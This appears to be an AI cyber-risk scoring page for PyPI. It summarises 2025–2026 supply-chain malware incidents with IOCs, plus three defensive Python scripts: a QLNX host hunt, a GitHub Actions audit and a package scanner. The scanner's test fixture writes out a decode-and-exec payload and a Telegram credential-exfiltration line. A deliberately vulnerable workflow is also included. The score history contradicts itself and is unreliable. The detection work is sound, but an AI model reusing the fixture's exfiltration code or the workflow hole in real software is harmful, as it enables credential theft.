PyPI A.I CyberSecurity Scoring
PyPI
Company Information
Website: https://pypi.org
Employees number: 4
Number of followers: 0
NAICS: 5112
Industry Type: Software Development
Homepage: pypi.org
PyPI Risk Score (AI oriented): 702/1000, Moderate (Ba), band 700 to 749
Updated: 12/06/2026
PyPI Global Score (TPRM): score locked
Current Score: 702 Ba (MODERATE), scale 0 to 1000
6 incidents, -18.17 average point impact per incident
Incident timeline with MITRE ATT&CK tactics, techniques, and mitigations.
JUNE 2026
Cyber Attack, 02 Jun 2026 • PyPI
npm, PyPI and Crates.io: 34 Malicious Packages Steal Cloud Keys, Wallets, and SSH Credentials
Score: 718 → 701 (CRITICAL, -17) • Incident ID: NPMPYPSOC1780388789
Large-Scale "TrapDoor" Supply Chain Attack Targets Developers Across npm, PyPI, and Crates.io
A sophisticated supply chain attack, dubbed “TrapDoor,” is actively targeting developers by abusing open-source ecosystems to steal sensitive data. The campaign spans npm, PyPI, and Crates.io, deploying 34 malicious packages across 384 versions to compromise systems in cryptocurrency, DeFi, AI, and cloud environments.
Attackers exploit legitimate package installation and build mechanisms such as npm’s postinstall scripts, Python’s import behavior, and Rust’s build.rs to execute malicious code automatically during installation or project builds, requiring no user interaction. The malware harvests SSH keys, cloud credentials, API tokens, and cryptocurrency wallets, exfiltrating data through trusted platforms like GitHub Pages, raw.githubusercontent.com, and webhook.site to evade detection.
### Key Malicious Packages & Tactics
- Python (PyPI): *git-config-sync*
  - Executes malicious code upon import, scanning the `.ssh`, `.aws`, `.docker` and `.kube` directories for credentials using regex patterns.
  - Disables TLS certificate verification on its own outbound requests and sends stolen data to attacker-controlled GitHub Pages endpoints.
- npm: *token-usage-tracker*
  - The most advanced variant, running a background process to collect browser credentials, cloud configs, shell histories, and cryptocurrency wallets.
  - Encrypts the collected data with Fernet before exfiltrating it via webhooks or GitHub Gist.
  - Gains persistence and propagation by modifying shell configs, injecting Git hooks, and poisoning AI development environment files (e.g., `.cursorrules`, `CLAUDE.md`) to influence coding assistants.
- Rust (Crates.io): *sui-framework-helpers*
  - Executes during builds via `build.rs`, targeting blockchain wallet files (Sui, Solana, Aptos).
  - Uses XOR obfuscation and uploads stolen data to public GitHub Gists.
### Attack Infrastructure & Evasion
The campaign leverages services that are commonly allow-listed in developer environments (GitHub Pages, webhook.site) to blend malicious traffic with legitimate developer activity. While the npm variant stands out for its persistence, propagation, and remote command execution, all samples follow a consistent pattern:
1. Trigger during install/build.
2. Harvest credentials from local environments.
3. Exfiltrate via trusted channels.
### Indicators of Compromise (IOCs)
- Domain: `ddjidd564[.]github[.]io`
- URLs:
  - `https[:]//ddjidd564[.]github[.]io/defi-security-best-practices/config.json`
  - `https[:]//webhook[.]site/2ada14c8-00f6-43ce-9ad6-f5dc15952246` (and similar webhook endpoints)
Security researchers warn the attack underscores the growing sophistication of supply chain threats, with developers in high-value sectors as prime targets.
Cyber Attack, 01 Jun 2026 • PyPI
PyPI and npm: Solana FakeFix Campaign Plants Malicious npm, PyPI Packages to Steal Dev Secrets
Score: 734 → 701 (CRITICAL, -33) • Incident ID: PYPNPM1781245506
Solana FakeFix Campaign: Supply-Chain Attack Targets Developers via Malicious npm and PyPI Packages
A recently uncovered supply-chain attack, dubbed "Solana FakeFix," has exposed a coordinated effort to steal developer secrets through malicious packages on npm and PyPI. The campaign, identified by JFrog Security Research, involved 20 trojanized packages (16 on npm and 4 on PyPI) that impersonated legitimate Solana tooling to harvest sensitive credentials.
### How the Attack Worked
The threat actors employed typosquatting and social engineering to trick developers into installing malicious packages. Some packages mimicked well-known Solana libraries, such as:
- `@solana-labs/web3.js` (a fake "community fork")
- `solana-web3-stable` (posing as a "stable-build" fix)
- `solana-mev-bot` (a fake MEV bot prompting users to input private keys)
The attacker, operating under the GitHub account PassWord1337, even spammed GitHub issues to promote a drop-in replacement for `@solana/web3.js`, urging users to switch via npm commands.
### Exploitation Techniques
- npm Packages: Used postinstall scripts to execute malicious JavaScript during installation.
- PyPI Packages: Embedded payloads in `__init__.py` files, triggering data theft upon import.
- Targeted Secrets: Stolen data included Solana wallet keys, AWS credentials, SSH keys, .env files, and GitHub tokens, identified by keywords like `KEY`, `SECRET`, `MNEMONIC`, and `AWS`.
- Exfiltration: Data was sent to Telegram C2 channels using hardcoded bot tokens. Later variants added interactive backdoor commands (`/keys`, `/ssh`, `/env`, `/sh`) and self-update mechanisms.
### Evolving Threats
Early versions were crude backdoors, but later packages bundled legitimate Solana code with hidden malicious payloads, making them harder to detect. One variant even tampered with Solana RPC endpoints to drain funds to attacker-controlled wallets.
### Related Windows Loader Campaign
JFrog also uncovered a separate but linked campaign involving five npm packages uploaded by the account thermonuclear. These packages:
- Executed PowerShell scripts during installation.
- Dropped Deno-based loaders or Windows EXE payloads.
- Established Registry Run-key persistence and dynamic C2 communication for payload rotation.
### Impact & Response
The attack highlights the risks of unverified dependencies in development pipelines. Organizations are advised to:
- Remove affected packages from workstations, CI systems, and caches.
- Rotate exposed Solana wallets, SSH keys, and cloud credentials.
- Rebuild compromised CI runners from trusted images.
- Enforce stricter registry hygiene, including scrutiny of install-time scripts and near-miss package names.
The campaign underscores the growing sophistication of supply-chain attacks targeting developers through trusted package registries.
MAY 2026
Cyber Attack, 06 May 2026 • PyPI
PyPI and npm: QLNX Threat Actors Steal Developer Credentials For Supply Chain Attacks
Score: 763 → 747 (CRITICAL, -16) • Incident ID: PYPNPM1778070456
New Linux Malware "Quasar Linux" (QLNX) Targets Developers in Supply Chain Attacks
Cybersecurity researchers have identified a highly sophisticated Linux remote access trojan (RAT) dubbed Quasar Linux (QLNX), a previously undocumented malware designed to infiltrate developer and DevOps workstations. The threat actor behind QLNX aims to steal credentials, enabling large-scale supply chain attacks by compromising trusted open-source packages on platforms like npm and PyPI.
Unlike conventional malware, QLNX functions as a full-fledged Linux implant, combining remote access, stealth, persistence, and credential harvesting in a single payload. Its minimal detection footprint allows attackers to maintain long-term, undetected access to infected systems.
### How QLNX Operates
QLNX employs advanced evasion techniques to avoid detection:
- Fileless execution: The malware copies itself into memory, deletes its original file, and re-executes from RAM, so no binary remains on disk.
- Process spoofing: It renames itself to look like a legitimate kernel thread (e.g., a watchdog or worker thread) to blend in with normal system activity.
- Environment wiping: The malware clears its own environment block to hinder forensic analysis.
### Credential Harvesting & Supply Chain Risks
QLNX’s primary objective is stealing high-value credentials from developer environments. It targets critical configuration files and authentication tokens, including:
- `.npmrc`, `.pypirc`, `.git-credentials`
- AWS credentials (`~/.aws/credentials`)
- Kubernetes configurations (`~/.kube/config`)
- Docker Hub logins
- Environment variables (`.env`)
Additionally, QLNX deploys a malicious PAM (Pluggable Authentication Module) with inline hooking to intercept plaintext passwords during authentication. Stolen credentials are encrypted and hidden in system log directories, allowing attackers to bypass security controls and access cloud infrastructure.
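The three evasion behaviours and the PAM hook above each leave a trace that `/proc` and the PAM configuration expose, and a hunt can key on those traces without a signature. The script below is an added example (not code from the QLNX report or any vendor): `evaluate()` checks one process record for a deleted or memfd-backed executable, a kernel-thread name on a process that has a parent other than kthreadd or a real `exe` link, and an empty environment block; `audit_pam()` flags PAM modules loaded from outside the distribution's module directories and any `pam_exec` hook. The process records and the PAM file are constructed; placing the rogue module under `/var/log/.cache` is an assumption that echoes the "hidden in system log directories" detail, not a known QLNX path.

```python
"""Host-side hunt for the QLNX behaviours described above: a process whose
binary was deleted after launch or lives in a memfd (fileless re-execution),
a user process dressed up as a kernel thread, a wiped environment block, and
a PAM stack that loads a module from outside the distribution's module
directories. Added example; indicators are generic for these techniques, not
signatures from the QLNX report, and the sample records are constructed."""
import os
import re
from dataclasses import dataclass
from typing import List, Optional

KERNEL_NAME = re.compile(r"^\[?(?:kworker|ksoftirqd|kthreadd|migration|rcu_|watchdog|kswapd|khugepaged|kcompactd)")
PAM_LINE = re.compile(r"^\s*-?(?:auth|account|password|session)\s+(?:\[[^\]]*\]|\S+)\s+(\S+)")
PAM_MODULE_DIRS = ("/lib/security", "/lib64/security", "/usr/lib/security",
                   "/usr/lib64/security", "/usr/lib/x86_64-linux-gnu/security")


@dataclass
class Proc:
    pid: int
    ppid: int
    comm: str              # /proc/<pid>/comm, what `ps` and `top` display
    cmdline: str           # /proc/<pid>/cmdline with NULs replaced by spaces
    exe: Optional[str]     # readlink(/proc/<pid>/exe); None when there is none
    environ_len: int       # bytes in /proc/<pid>/environ; -1 when unreadable


def evaluate(p: Proc) -> List[str]:
    """Return the indicator names that fire for one process record."""
    hits = []
    if p.exe and (p.exe.endswith(" (deleted)") or p.exe.startswith("/memfd:")):
        hits.append("deleted_or_memfd_exe")   # runs from memory, binary gone from disk
    if KERNEL_NAME.match(p.comm) or KERNEL_NAME.match(p.cmdline):
        # genuine kernel threads are children of kthreadd (pid 2) and have no exe link
        if p.ppid not in (0, 2) or p.exe is not None:
            hits.append("fake_kernel_thread")
    if p.environ_len == 0 and p.exe is not None and p.ppid not in (0, 2):
        hits.append("empty_environ")          # context wiped; weak signal on its own
    return hits


def collect_live() -> List[Proc]:
    """Read live /proc (Linux only; root is needed to see other users' exe links)."""
    procs = []
    for pid in (int(d) for d in os.listdir("/proc") if d.isdigit()):
        base = f"/proc/{pid}"
        try:
            with open(f"{base}/comm") as fh:
                comm = fh.read().strip()
            with open(f"{base}/cmdline", "rb") as fh:
                cmdline = fh.read().replace(b"\0", b" ").decode(errors="replace").strip()
            with open(f"{base}/stat") as fh:          # "pid (comm) state ppid ..."
                ppid = int(fh.read().rsplit(")", 1)[1].split()[1])
            try:
                exe = os.readlink(f"{base}/exe")
            except OSError:
                exe = None
            try:
                with open(f"{base}/environ", "rb") as fh:
                    environ_len = len(fh.read())
            except PermissionError:
                environ_len = -1
        except (FileNotFoundError, ProcessLookupError):
            continue                                  # process exited mid-read
        procs.append(Proc(pid, ppid, comm, cmdline, exe, environ_len))
    return procs


def audit_pam(config_text: str):
    """Flag PAM modules loaded from unexpected places and pam_exec hooks."""
    findings = []
    for lineno, line in enumerate(config_text.splitlines(), 1):
        m = PAM_LINE.match(line)
        if not m:
            continue
        module = m.group(1)
        if module.startswith("/") and os.path.dirname(module) not in PAM_MODULE_DIRS:
            findings.append((lineno, module, "module outside standard PAM directories"))
        if os.path.basename(module) == "pam_exec.so":
            findings.append((lineno, module, "pam_exec runs an external command at auth time; review it"))
    return findings


SAMPLE_PROCS = [   # constructed records, not captures from an infected host
    Proc(4321, 1, "kworker/u8:3", "[kworker/u8:3]", "/tmp/.x/qlnx (deleted)", 0),
    Proc(17, 2, "kworker/0:1", "", None, 0),          # genuine kernel thread
    Proc(900, 1, "sshd", "/usr/sbin/sshd -D", "/usr/sbin/sshd", 120),
]
SAMPLE_PAM = """\
auth    required    pam_env.so
auth    [success=1 default=ignore]  pam_unix.so nullok
auth    requisite   pam_deny.so
auth    required    /var/log/.cache/pam_sec.so
session optional    pam_exec.so /tmp/.x/update.sh
"""


def demo():
    return {"hunt": {p.pid: evaluate(p) for p in SAMPLE_PROCS}, "pam": audit_pam(SAMPLE_PAM)}


if __name__ == "__main__":
    if os.path.isdir("/proc"):
        for proc in collect_live():                   # live sweep of this host
            live_hits = evaluate(proc)
            if live_hits:
                print(proc.pid, proc.comm, live_hits)
    print(demo())
```

The genuine kernel thread in the sample produces no hits because its parent is kthreadd and it has no `exe` link; a user process that merely renamed itself cannot satisfy both. Run `collect_live()` as root on a suspect host, then feed `/etc/pam.d/*` through `audit_pam()` and compare every referenced module against the distribution's package manifest.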
A single compromised developer account can enable threat actors to:
- Push trojanized updates to millions of users
- Pivot through CI/CD pipelines
- Establish backdoors in production environments
### Resilient Infrastructure & Detection Challenges
QLNX includes a peer-to-peer mesh networking capability, turning infected machines into a resilient botnet. This makes complete eradication across an enterprise difficult, as the malware can persist even if some nodes are cleaned.
Security platforms leveraging AI-driven threat hunting recently flagged QLNX, highlighting the limitations of traditional signature-based detection. Given the lack of uniform security controls in developer environments, such implants remain a persistent risk to software supply chains.
Cyber Attack, 01 May 2026 • PyPI
GitHub, PyPI and 1Password: 170 npm Packages Hijacked to Steal GitHub, AWS & Kubernetes Secrets
Score: 780 → 763 (CRITICAL, -17) • Incident ID: PYPGIT1PA1778761827
Large-Scale Supply Chain Attack Compromises 170+ npm Packages and PyPI Libraries
Hackers have executed a sophisticated supply chain attack by infiltrating over 170 npm packages and two PyPI libraries, collectively downloaded more than 200 million times per week. The campaign, attributed to the resurfaced "Shai-Hulud" malware, steals developer and cloud credentials while exhibiting worm-like propagation across development ecosystems.
### Attack Mechanics
The malicious npm packages contain a hidden preinstall script that executes during installation, deploying a loader to fetch an obfuscated JavaScript payload. Unlike typical credential stealers, this malware modifies legitimate package code, injects malicious components, and republishes infected versions, turning compromised environments into new attack vectors.
The PyPI variant embeds a downloader in the import process, fetching a remote Python payload that targets cloud platforms, local systems, and developer tools. Both variants employ multi-layered obfuscation, deriving a key with PBKDF2-SHA256 and decrypting the next stage with AES-256 at runtime, to evade detection.
### Initial Compromise & Propagation
The attack originated from a misconfigured GitHub Actions workflow, where attackers exploited untrusted forked code to execute within a privileged environment. Once inside CI/CD pipelines, the malware extracts GitHub Actions tokens, OIDC identity data, and npm publishing credentials, enabling large-scale package hijacking.
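The page does not say which workflow setting let forked code into a privileged job, so the audit below checks for the best-known form of that misconfiguration, as an assumption: a trigger that carries repository secrets and a write token (`pull_request_target` or `workflow_run`), an `actions/checkout` of the pull request head, and a `run` step after it. This is an added example, not tooling from JFrog or GitHub, and both workflows are constructed for it.

```python
"""Line-based audit of a GitHub Actions workflow for the pattern that lets a
fork's code run in a privileged job: a trigger that carries repository secrets
and a write token (pull_request_target or workflow_run), an actions/checkout
of the pull request head, and a run step after it. Added example; the page
does not state which workflow was misconfigured, so this pattern is an
assumption, and both workflows below are constructed."""
import re
from dataclasses import dataclass

PRIVILEGED_TRIGGER = re.compile(r"\b(?:pull_request_target|workflow_run)\b")
CHECKOUT = re.compile(r"uses:\s*actions/checkout")
HEAD_REF = re.compile(r"github\.(?:event\.pull_request\.head\.(?:sha|ref)|head_ref)")
STEP_START = re.compile(r"^\s*-\s")
RUN_STEP = re.compile(r"^\s*-?\s*run:")
WRITE_PERMS = re.compile(r"^\s*(?:contents|id-token|packages|pull-requests):\s*write\b", re.M)


@dataclass
class Audit:
    privileged_trigger: bool
    head_checkout: bool
    runs_after_checkout: bool
    write_permissions: bool

    @property
    def verdict(self):
        if self.privileged_trigger and self.head_checkout and self.runs_after_checkout:
            return "vulnerable"   # untrusted code executes with secrets and a write token
        if self.privileged_trigger and self.head_checkout:
            return "suspicious"   # PR head checked out; any later step that builds it is the hole
        return "ok"


def audit_workflow(text: str) -> Audit:
    privileged = bool(PRIVILEGED_TRIGGER.search(text))
    head_checkout = runs_after = in_checkout = False
    for line in text.splitlines():
        if STEP_START.match(line):            # a new step: '- uses:' or '- name:'
            in_checkout = bool(CHECKOUT.search(line))
        elif CHECKOUT.search(line):           # 'uses:' on the line after '- name:'
            in_checkout = True
        if in_checkout and HEAD_REF.search(line):
            head_checkout = True              # 'ref:' points at the fork's commit
        if head_checkout and RUN_STEP.match(line):
            runs_after = True                 # e.g. npm install, which fires postinstall
    return Audit(privileged, head_checkout, runs_after, bool(WRITE_PERMS.search(text)))


# Constructed workflows: the first mirrors the misconfiguration, the second the fix.
VULNERABLE = """\
name: PR build
on:
  pull_request_target:
    types: [opened, synchronize]
permissions:
  contents: write
  pull-requests: write
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: npm ci
      - run: npm publish
        env:
          NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
"""

HARDENED = """\
name: PR build
on: pull_request
permissions:
  contents: read
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci --ignore-scripts
      - run: npm test
"""


def demo():
    return {"vulnerable": audit_workflow(VULNERABLE).verdict,
            "hardened": audit_workflow(HARDENED).verdict}


if __name__ == "__main__":
    for name, text in (("vulnerable", VULNERABLE), ("hardened", HARDENED)):
        result = audit_workflow(text)
        print(name, result.verdict, result)
```

In the hardened form a fork's pull request runs under `pull_request`, where GitHub hands the job a read-only token and withholds repository secrets, so there is nothing for the PR's install scripts to steal; `--ignore-scripts` additionally keeps npm lifecycle scripts from running during install, the other hook the incidents on this page abuse. Run `audit_workflow()` over every file in `.github/workflows/` of a repository and treat any "vulnerable" result as a publish-credential exposure.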
### Credential Theft & Exfiltration
The payload targets a broad range of sensitive data, including:
- GitHub tokens, Actions secrets, and npm credentials
- AWS, GCP, and Azure credentials (via environment variables, files, and metadata services)
- Kubernetes service account tokens and HashiCorp Vault secrets
- SSH keys, .npmrc files, shell history, and API keys
- Password manager data (1Password, Bitwarden)
Stolen data is exfiltrated through encrypted uploads to attacker-controlled servers, GitHub repositories, and decentralized networks (e.g., Session/Oxen). A notable indicator is commits authored by "[email protected]."
### Destructive Capabilities
The malware includes a "dead-man switch": a persistent service that monitors the stolen GitHub tokens. If a token is revoked, the malware may trigger destructive actions, such as wiping the infected system. The PyPI variant can also deploy a second-stage payload capable of deleting entire Linux systems under certain conditions.
### Detection & Response
Security researchers at JFrog detected and blocked all malicious packages within 24 hours, but the incident highlights vulnerabilities in CI/CD trust mechanisms. The attack demonstrates how compromised build processes can turn verified pipelines into malware distribution channels, underscoring the need for stricter runtime monitoring and credential hygiene.
APRIL 2026
Cyber Attack, 22 Apr 2026 • PyPI
Python Package Index: Xinference allegedly hacked by TeamPCP, Malicious Package In PyPI
Score: 793 → 780 (CRITICAL, -13) • Incident ID: PYP1776918478
Malicious Xinference Versions on PyPI Steal Cloud Credentials and Sensitive Data
A supply chain attack targeting the Python package Xinference has exposed users to a sophisticated infostealer malware. Threat actors uploaded malicious versions (2.6.0, 2.6.1, and 2.6.2) to the Python Package Index (PyPI) on April 22, 2026, containing heavily obfuscated code designed to exfiltrate sensitive data. While the malware includes references to TeamPCP in its payload, the group has publicly denied involvement via its X (formerly Twitter) account.
The compromised versions execute a base64-encoded payload upon package initialization, harvesting a wide range of credentials and system data, including:
- Cloud credentials (AWS, GCP, Kubernetes tokens)
- Environment variables and SSH keys
- API keys, database passwords, and cryptocurrency wallets (Bitcoin, Ethereum, Monero, etc.)
- Shell history, SSL certificates, and service credentials (Slack, Discord, Postfix)
- System metadata (IP addresses, usernames, network interfaces)
The stolen data is compressed and sent to a command-and-control (C2) server at `https://whereisitat[.]lucyatemysuperbox[.]space/`. The attack was discovered after a user reported suspicious behavior, prompting Xinference developers to confirm the breach.
With over 600,000 total downloads, the full scope of affected users remains unclear. Versions 2.5.0 and earlier are unaffected. The malicious commit was traced to a bot account (XprobeBot), active since October 2025, which inserted the payload into the package's `__init__.py` file.
This incident underscores the growing threat of supply chain attacks, where compromised maintainer accounts or automated bots are increasingly used to distribute malware at scale.
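Four of the incidents on this page (TrapDoor's `git-config-sync`, the Solana FakeFix PyPI packages, the Shai-Hulud PyPI variant and the Xinference releases) share one shape: code in `__init__.py` or `setup.py` that runs on import or install, decodes a blob and executes it, sweeps `.ssh`/`.aws`/`.kube`/`.docker`, and ships the result to Telegram, webhook.site or GitHub Pages. The scanner below is an added example (not tooling from PyPI, JFrog or the other researchers cited) that reads a package tree as text, without importing it, and rates it on those shared traits. The regexes are heuristics chosen here, not published signatures, and both sample packages are constructed: the base64 blob in the bad one decodes to a comment.

```python
"""Static triage of a Python package tree for the install-time and import-time
payload patterns the incidents above share: a blob decoded and exec'd from
__init__.py or setup.py, sweeps of ~/.ssh, ~/.aws, ~/.kube and ~/.docker,
hardcoded Telegram bot tokens, exfiltration via webhook.site or GitHub Pages,
TLS verification switched off, and setup.py install hooks. It only reads
source text and never imports or executes the package under test.
Added example; the regexes are heuristics chosen here, not signatures from any
of the cited researchers, and both sample packages are constructed."""
import base64
import os
import re
import tempfile
from dataclasses import dataclass

# `pip install` runs setup.py and `import pkg` runs pkg/__init__.py, so a hit in
# either file fires with no further action from the developer.
AUTO_EXEC = {"setup.py", "__init__.py"}

INDICATORS = {
    "exec_call": re.compile(r"\b(?:exec|eval)\s*\("),
    "decode_call": re.compile(r"\b(?:base64\.b64decode|bytes\.fromhex|zlib\.decompress|marshal\.loads)\s*\("),
    "long_b64_literal": re.compile(r"[\"'][A-Za-z0-9+/]{120,}={0,2}[\"']"),
    "credential_paths": re.compile(r"\.(?:ssh|aws|kube|docker|npmrc|pypirc|git-credentials)\b"),
    "secret_keywords": re.compile(r"\b(?:MNEMONIC|SECRET|PRIVATE_KEY|AWS_SECRET_ACCESS_KEY)\b"),
    "telegram_bot_token": re.compile(r"\b\d{8,10}:[A-Za-z0-9_-]{35}\b"),
    "telegram_api": re.compile(r"api\.telegram\.org"),
    "exfil_host": re.compile(r"webhook\.site|\.github\.io|raw\.githubusercontent\.com|gist\.github\.com"),
    "tls_verify_disabled": re.compile(r"verify\s*=\s*False|_create_unverified_context|CERT_NONE"),
    "install_hook": re.compile(r"cmdclass\s*=|class\s+\w+\s*\(\s*(?:install|develop|egg_info)\s*\)"),
}
STRONG = {"telegram_bot_token", "telegram_api", "exfil_host"}
SECRET_HUNT = {"credential_paths", "secret_keywords"}


@dataclass(frozen=True)
class Finding:
    path: str
    line: int
    indicator: str
    text: str


def scan_file(path):
    findings = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            for name, rx in INDICATORS.items():
                if rx.search(line):
                    findings.append(Finding(path, lineno, name, line.strip()[:80]))
    return findings


def scan_tree(root):
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".py"):
                findings.extend(scan_file(os.path.join(dirpath, name)))
    return findings


def verdict(findings):
    """'high' when an auto-executed file decodes-then-execs, or when a secret
    sweep is paired with a known exfiltration channel; 'medium' for either alone."""
    auto = {f.indicator for f in findings if os.path.basename(f.path) in AUTO_EXEC}
    every = {f.indicator for f in findings}
    if {"exec_call", "decode_call"} <= auto or {"exec_call", "long_b64_literal"} <= auto:
        return "high"
    if every & STRONG and every & SECRET_HUNT:
        return "high"
    if every & (STRONG | SECRET_HUNT | {"tls_verify_disabled", "install_hook"}):
        return "medium"
    return "low" if findings else "clean"


def build_samples(base):
    """Write a benign package and a malicious-style one (constructed: the
    base64 blob decodes to a comment and nothing here is ever imported)."""
    good = os.path.join(base, "goodpkg")
    os.makedirs(good)
    with open(os.path.join(good, "__init__.py"), "w") as fh:
        fh.write("from .core import add\n")
    with open(os.path.join(good, "core.py"), "w") as fh:
        fh.write("def add(a, b):\n    return a + b\n")
    bad = os.path.join(base, "badpkg")
    os.makedirs(bad)
    blob = base64.b64encode(b"# inert payload stand-in\n").decode()
    with open(os.path.join(bad, "__init__.py"), "w") as fh:
        fh.write(
            "import base64, os, requests\n"
            f"_p = base64.b64decode('{blob}')\n"
            "exec(_p)\n"
            "DIRS = ('.ssh', '.aws', '.kube', '.docker')  # swept for keys\n"
            "TOKEN = '1234567890:AAEXAMPLEexampleEXAMPLEexample12345'\n"
            "requests.post('https://api.telegram.org/bot' + TOKEN + '/sendDocument', verify=False)\n"
        )
    return good, bad


def demo():
    """Run the scanner over the two constructed packages."""
    base = tempfile.mkdtemp(prefix="pkgtriage-")
    good, bad = build_samples(base)
    bad_findings = scan_tree(bad)
    return {
        "goodpkg": verdict(scan_tree(good)),
        "badpkg": verdict(bad_findings),
        "badpkg_indicators": sorted({f.indicator for f in bad_findings}),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Point `scan_tree()` at an unpacked sdist or wheel (`pip download --no-deps --no-binary :all: <pkg>` then extract) before anything imports it; a single `cmdclass` in `setup.py` is common in legitimate packages and is deliberately rated only "medium", while decode-then-exec inside an auto-executed file is rated "high" on its own because no benign package needs it.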
MARCH 2026: 793
FEBRUARY 2026: 793
JANUARY 2026: 793
DECEMBER 2025
Cyber Attack, 26 Dec 2025 • PyPI
Oracle Cloud, Azure and AWS: TeamPCP Turns Cloud Infrastructure into Crime Bots
Score: 793 → 780 (CRITICAL, -13) • Incident ID: AMAORAMIC1770695748
TeamPCP Exploits Cloud Misconfigurations in Large-Scale Cybercrime Operation
A threat actor known as TeamPCP (also operating under aliases like PCPcat and ShellForce) is conducting automated, worm-like attacks on misconfigured and exposed cloud management services, compromising at least 60,000 servers worldwide since late December. The group’s campaign primarily targets Azure (60% of attacks), AWS (37%), and Google and Oracle cloud environments, exploiting well-documented vulnerabilities and misconfigurations rather than developing new attack methods.
TeamPCP's operations involve scanning for exposed Docker APIs, Kubernetes clusters, Ray dashboards, and systems with leaked secrets (such as `.env` files). Once inside, the group deploys malicious Python and shell scripts to install proxies, tunneling software, and persistence mechanisms, effectively converting compromised infrastructure into a self-propagating botnet. A key tool in their arsenal is the React2Shell vulnerability, which allows remote command execution and data exfiltration.
The group monetizes its attacks through multiple revenue streams, including:
- Cryptocurrency mining using hijacked compute resources.
- Data theft and extortion, with stolen records including personal IDs, employment records, and résumés published on a leak site operated by an affiliate, ShellForce.
- Selling access to compromised systems for use as proxies or command-and-control infrastructure.
- Ransomware deployment, leveraging infected systems as launchpads for further attacks.
Notably, TeamPCP has targeted JobsGO, a Vietnamese recruitment platform, exfiltrating over two million records containing sensitive personal and professional data. Most victims are located in South Korea, Canada, the U.S., Serbia, and the UAE, with stolen information often used for phishing, impersonation, or account takeovers.
Despite its sophistication, TeamPCP's techniques are not novel: the group relies on automated exploitation of known vulnerabilities and recycled tooling. Security firm Flare warns that the threat actor's strength lies in its large-scale automation, turning exposed cloud infrastructure into a distributed criminal ecosystem. The group also maintains a Telegram channel (launched in November, with ~700 members) for updates and reputation-building, though researchers suggest it may have operated under previous aliases.
The campaign underscores the risks of unsecured cloud control planes, leaked credentials, and poor access controls, as TeamPCP continues to industrialize existing attack vectors with alarming efficiency.
NOVEMBER 2025: 793
OCTOBER 2025: 793
SEPTEMBER 2025: 793
AUGUST 2025: 793
JULY 2025: 793
Frequently Asked Questions
- What is the current A.I Rankiteo Cyber Score for PyPI?
- What was PyPI's A.I Rankiteo Cyber Score in May 2026?
- What was PyPI's A.I Rankiteo Cyber Score in April 2026?
- What was PyPI's A.I Rankiteo Cyber Score in March 2026?
- What was PyPI's A.I Rankiteo Cyber Score in February 2026?
- What was PyPI's A.I Rankiteo Cyber Score in January 2026?
- What was PyPI's A.I Rankiteo Cyber Score in December 2025?
- What was PyPI's A.I Rankiteo Cyber Score in November 2025?
- What was PyPI's A.I Rankiteo Cyber Score in October 2025?
- What was PyPI's A.I Rankiteo Cyber Score in September 2025?
- What was PyPI's A.I Rankiteo Cyber Score in August 2025?
- What was PyPI's A.I Rankiteo Cyber Score in July 2025?
- What is the average per-incident point impact on PyPI's A.I Rankiteo Cyber Score over the past 12 months?
- Where can I access detailed records of all cyber incidents associated with PyPI?
- Where can I find a summary of the A.I Rankiteo Risk Scoring methodology?
- Where can I view PyPI's profile page on Rankiteo?
- How accurate is the A.I Rankiteo Risk Scoring methodology?